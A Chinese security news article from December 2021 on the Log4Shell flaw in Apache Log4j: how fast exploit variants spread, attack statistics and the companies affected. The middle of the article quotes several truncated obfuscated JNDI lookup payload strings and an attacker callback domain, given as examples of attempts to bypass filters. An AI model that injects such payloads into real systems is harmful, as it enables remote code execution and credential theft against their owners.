安全動態(tài)

失控!Log4Shell漏洞出現(xiàn)六十多個惡性變種

來源:聚銘網(wǎng)絡(luò)    發(fā)布時間:2021-12-16    瀏覽次數(shù):
 

信息來源:安全內(nèi)參


2021年最重大的網(wǎng)絡(luò)安全災(zāi)難莫過于當(dāng)下肆虐全球的Apache Log4j日志庫漏洞利用(又稱Log4Shell,編號CVE-2021-44228)。

自上周公開披露以來,Log4Shell漏洞像癌癥一樣在互聯(lián)網(wǎng)上迅猛擴散,導(dǎo)致全球的企業(yè)安全人員都失去了周末假期。

根據(jù)業(yè)界眾多網(wǎng)絡(luò)安全公司的觀測,目前大多數(shù)Log4Shell漏洞利用主要是挖礦軟件,但攻擊者也在積極嘗試在易受攻擊的系統(tǒng)上安裝更危險的惡意軟件。據(jù)微軟研究人員稱,除了挖礦軟件之外,他們還看到了Cobalt Strike的安裝,攻擊者可以用它來竊取密碼,通過橫向移動進(jìn)一步潛入受感染的網(wǎng)絡(luò)并竊取數(shù)據(jù)。

更為糟糕的是,該漏洞利用正在發(fā)生快速變異,繞過現(xiàn)有緩解措施,并吸引了越來越多的攻擊者。Check Point的網(wǎng)絡(luò)安全研究人員周一警告說,Log4Shell正在快速變異,已經(jīng)產(chǎn)生60多個更強大的變種,所有變種都在不到一天的時間內(nèi)產(chǎn)生。


研究人員指出:“自周五以來,我們目睹了一種類似病毒進(jìn)化的迅猛勢頭,原始漏洞的新變種被迅速引入:在不到24小時內(nèi)涌現(xiàn)超過60種?!?

Log4Shell是個極度危險的漏洞,因為它非常容易被利用,且駐留在無處不在的Java日志庫Apache Log4j中,漏洞利用可導(dǎo)致未經(jīng)身份驗證的遠(yuǎn)程代碼執(zhí)行(RCE)和服務(wù)器被完全接管。

突變可能使漏洞利用繞過緩解措施

周一,Check Point報告說,Log4Shell的新的惡性變種現(xiàn)在已經(jīng)可以“通過HTTP或HTTPS”被利用。

Check Point表示,利用該漏洞的方法越多,攻擊者就越容易繞過自周五以來安全廠商和企業(yè)瘋狂推出的新保護(hù)措施。這意味著一層保護(hù)是不夠的,只有多層安全態(tài)勢才能提供彈性保護(hù)。


由于Log4Shell的攻擊面巨大,一些安全專家稱Log4Shell是今年最大的網(wǎng)絡(luò)安全災(zāi)難,將其與2014年Shellshock系列安全漏洞相提并論,后者被受感染計算機的僵尸網(wǎng)絡(luò)用于執(zhí)行分布式拒絕服務(wù)(DDoS)攻擊和漏洞掃描,在其最初披露后的數(shù)小時內(nèi)就被野外利用。

攻擊戰(zhàn)術(shù)轉(zhuǎn)變

除了可以繞過保護(hù)措施的變化之外,研究人員還看到了漏洞利用的新策略。

人工智能網(wǎng)絡(luò)安全公司Vectra的威脅情報負(fù)責(zé)人Luke Richards周一透露,最初的漏洞利用嘗試是基本的回調(diào),最初的漏洞利用嘗試來自TOR節(jié)點。他們主要指向“bingsearchlib[.]com”,利用被傳遞到用戶代理或請求的統(tǒng)一資源標(biāo)識符(URI)。

但自從第一波利用嘗試?yán)顺币詠?,Vectra已經(jīng)跟蹤了利用該漏洞的威脅行為者在策略上的許多變化。值得注意的是,正在使用的命令發(fā)生了變化,因為威脅行為者已經(jīng)開始混淆他們的請求。

Richards解釋說:“這最初包括用base64字符串填充用戶代理或URI,當(dāng)易受攻擊的系統(tǒng)解碼時,會導(dǎo)致主機從攻擊者基礎(chǔ)設(shè)施下載惡意dropper?!痹诖酥?,攻擊者開始利用JDNI進(jìn)程的其他轉(zhuǎn)換功能來混淆Java命名和目錄接口(JDNI)字符串本身。

他舉了以下代碼實例:

${jndi:${lower:l}${lower:d}a${lower:p}://world80

${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//

${jndi:dns://

所有這些都實現(xiàn)了相同的目標(biāo):“下載惡意類文件并將其放到目標(biāo)系統(tǒng)上,或者泄露基于云的系統(tǒng)的憑據(jù),”Richards說道。

漏洞已被公開利用數(shù)周

至少從12月1日起,攻擊者就一直在圍繞Log4Shell漏洞進(jìn)行討論,事實證明,一旦CVE-2021-44228在上周晚些時候公開披露,就像打開了潘多拉盒子,蜜罐中涌入了大批攻擊者。

周日,Sophos研究人員表示,他們“自12月9日以來已經(jīng)檢測到數(shù)十萬次利用此漏洞遠(yuǎn)程執(zhí)行代碼的嘗試”(上圖),并指出其他組織(包括Cloudflare)的日志搜索表明該漏洞可能已被公開利用數(shù)周。


Cloudflare首席執(zhí)行官Matthew Prince周六在推特上說:“到目前為止,我們發(fā)現(xiàn)的#Log4J漏洞利用的最早證據(jù)是2021-12-01 04:36:50 UTC?!薄斑@表明它至少在公開披露前9天就已經(jīng)存在了。但是,在公開披露之前沒有看到大規(guī)模漏洞利用的證據(jù)?!?

上周日,思科Talos表示最早在12月2日就檢測到攻擊者利用CVE-2021-44228,建議企業(yè)將威脅掃描的起始日期大幅提前。

40%的企業(yè)網(wǎng)絡(luò)已遭遇漏洞利用攻擊

Check Point周一表示,它挫敗了超過845000次漏洞利用嘗試,其中超過46%的嘗試是由已知的惡意組織發(fā)起的。Check Point警告說,每分鐘有超過100次嘗試?yán)迷撀┒础?

截至美國東部時間周一上午9點,其研究人員已經(jīng)發(fā)現(xiàn),全球超過40%的企業(yè)網(wǎng)絡(luò)都遭遇了漏洞利用攻擊。


下圖說明了全球范圍漏洞利用的地區(qū)分布:

受漏洞影響的知名企業(yè)名單(部分):

截至周一,互聯(lián)網(wǎng)仍處于崩潰模式,根據(jù)GitHub上托管的一個漏洞影響企業(yè)名單,包括蘋果、騰訊、Twitter、百度、滴滴、京東、網(wǎng)易、亞馬遜、特斯拉、谷歌等大量知名互聯(lián)網(wǎng)科技企業(yè)都受到Log4Shell的影響(名單還附上了證據(jù)鏈接):

完整名單鏈接:

https://github.com/YfryTchsGD/Log4jAttackSurface



 
 

上一篇:CVE-2021-4104應(yīng)急處置

下一篇:2022年信息安全十大預(yù)測